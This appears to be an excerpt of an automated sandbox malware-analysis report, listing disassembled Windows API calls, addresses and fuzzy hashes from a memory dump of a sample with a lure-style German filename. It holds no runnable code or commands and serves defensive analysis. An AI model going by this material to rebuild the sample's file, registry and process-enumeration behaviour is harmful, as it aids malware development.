                                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                            APIs
                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                                            • String ID:
                                                            • API String ID: 2154303073-0
                                                            • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                            • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                            APIs
                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 3150196962-0
                                                            • Opcode ID: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                            • Opcode Fuzzy Hash: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$PointerRead
                                                            • String ID:
                                                            • API String ID: 3154509469-0
                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                            APIs
                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                            • String ID:
                                                            • API String ID: 4232544981-0
                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                            APIs
                                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                            APIs
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$FileModuleName
                                                            • String ID:
                                                            • API String ID: 3859505661-0
                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                            APIs
                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                            APIs
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                            APIs
                                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                            • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                            APIs
                                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                            APIs
                                                            • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: EnumNamesResource
                                                            • String ID:
                                                            • API String ID: 3334572018-0
                                                            APIs
                                                            • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            APIs
                                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: CloseFind
                                                            • String ID:
                                                            • API String ID: 1863332320-0
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            APIs
                                                            • memset.MSVCRT ref: 004095FC
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 3655998216-0
                                                            APIs
                                                            • memset.MSVCRT ref: 00445426
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                            • String ID:
                                                            • API String ID: 1828521557-0
                                                            APIs
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                              • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                            • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: ??2@FilePointermemcpy
                                                            • String ID:
                                                            • API String ID: 609303285-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: _wcsicmp
                                                            • String ID:
                                                            • API String ID: 2081463915-0
                                                            APIs
                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                            • String ID:
                                                            • API String ID: 2136311172-0
                                                            APIs
                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: ??2@??3@
                                                            • String ID:
                                                            • API String ID: 1936579350-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: free
                                                            • String ID:
                                                            • API String ID: 1294909896-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: free
                                                            • String ID:
                                                            • API String ID: 1294909896-0
                                                            APIs
                                                            Similarity
                                                            • API ID: free
                                                            • String ID:
                                                            • API String ID: 1294909896-0
                                                            APIs
                                                            • EmptyClipboard.USER32 ref: 004098EC
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
